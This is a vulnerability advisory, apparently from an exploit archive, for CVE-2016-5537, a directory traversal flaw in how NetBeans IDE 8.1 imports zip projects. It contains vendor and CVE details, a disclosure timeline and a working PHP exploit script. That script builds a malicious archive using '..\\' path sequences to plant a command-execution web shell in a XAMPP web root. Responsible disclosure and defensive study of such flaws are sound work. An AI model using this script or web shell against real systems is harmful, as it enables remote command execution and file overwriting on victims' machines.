Oracle Netbeans IDE 8.1 Directory Traversal

`[+] Credits: John Page aka hyp3rlinx  
  
[+] Website: hyp3rlinx.altervista.org  
  
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/ORACLE-NETBEANS-IDE-DIRECTORY-TRAVERSAL.txt  
  
[+] ISR: ApparitionSec  
  
  
  
Vendor:  
===============  
www.oracle.com  
  
  
  
Product:  
=================  
Netbeans IDE v8.1  
  
  
  
Vulnerability Type:  
=========================  
Import Directory Traversal  
  
  
  
CVE Reference:  
==============  
CVE-2016-5537  
  
  
  
Vulnerability Details:  
=====================  
  
This was part of Oracle Critical Patch Update for October 2016.  
  
Vulnerability in the NetBeans component of Oracle Fusion Middleware  
(subcomponent: Project Import).  
The supported version that is affected is 8.1. Easily exploitable  
vulnerability allows high privileged attacker with logon  
to the infrastructure where NetBeans executes to compromise NetBeans. While  
the vulnerability is in NetBeans, attacks may significantly  
impact additional products. Successful attacks of this vulnerability can  
result in unauthorized update, insert or delete access to some  
of NetBeans accessible data as well as unauthorized read access to a subset  
of NetBeans accessible data and unauthorized ability to cause  
a partial denial of service (partial DOS) of NetBeans.  
  
Vulnerability in way Netbeans processes ".zip" archives to be imported as  
project. If a user imports a malicious project  
containing "../" characters the import will fail, yet still process the  
"../". we can then place malicious scripts outside of  
the target directory and inside web root if user is running a local server  
etc...  
  
It may be possible to then execute remote commands on the affected system  
by later visiting the URL and access our script if that  
web server is public facing, if it is not then it may still be subject to  
abuse internally by internal malicious users. Moreover,  
it is also possible to overwrite files on the system hosting vulnerable  
versions of NetBeans IDE.  
  
  
References:  
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixFMW  
  
  
Exploit Code(s):  
=================  
  
<?php  
#archive path traversal  
#target xampp htdocs as POC  
#by hyp3rlinx  
#===============================  
if($argc<4){echo "Usage: <zip name>, <path depth>, <RCE.php as default?  
Y/[file]>";exit();}  
$zipname=$argv[1];  
$exploit_file="RCE.php";  
$cmd='<?php exec($_GET["cmd"]); ?>';  
if(!empty($argv[2])&&is_numeric($argv[2])){  
$depth=$argv[2];  
}else{  
echo "Second flag <path depth> must be numeric!, you supplied '$argv[2]'";  
exit();  
}  
if(strtolower($argv[3])!="y"){  
if(!empty($argv[3])){  
$exploit_file=$argv[3];  
}  
if(!empty($argv[4])){  
$cmd=$argv[4];  
}else{  
echo "Usage: enter a payload for file $exploit_file wrapped in double  
quotes";  
exit();  
}  
}  
$zip = new ZipArchive();  
$res = $zip->open("$zipname.zip", ZipArchive::CREATE);  
$zip->addFromString(str_repeat("..\\",  
$depth)."\\xampp\\htdocs\\".$exploit_file, $cmd);  
$zip->close();  
echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";  
echo "================ hyp3rlinx ===================";  
?>  
  
  
Disclosure Timeline:  
=======================================  
Vendor Notification: September 20, 2016  
October 20, 2016 : Public Disclosure  
  
  
  
Exploitation Technique:  
=======================  
Local  
  
  
  
Severity Level:  
=====================  
CVSS VERSION 3.0 RISK  
5.7  
  
  
  
[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the  
information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author  
prohibits any malicious use of security related information  
or exploits by the author or elsewhere.  
  
hyp3rlinx  
`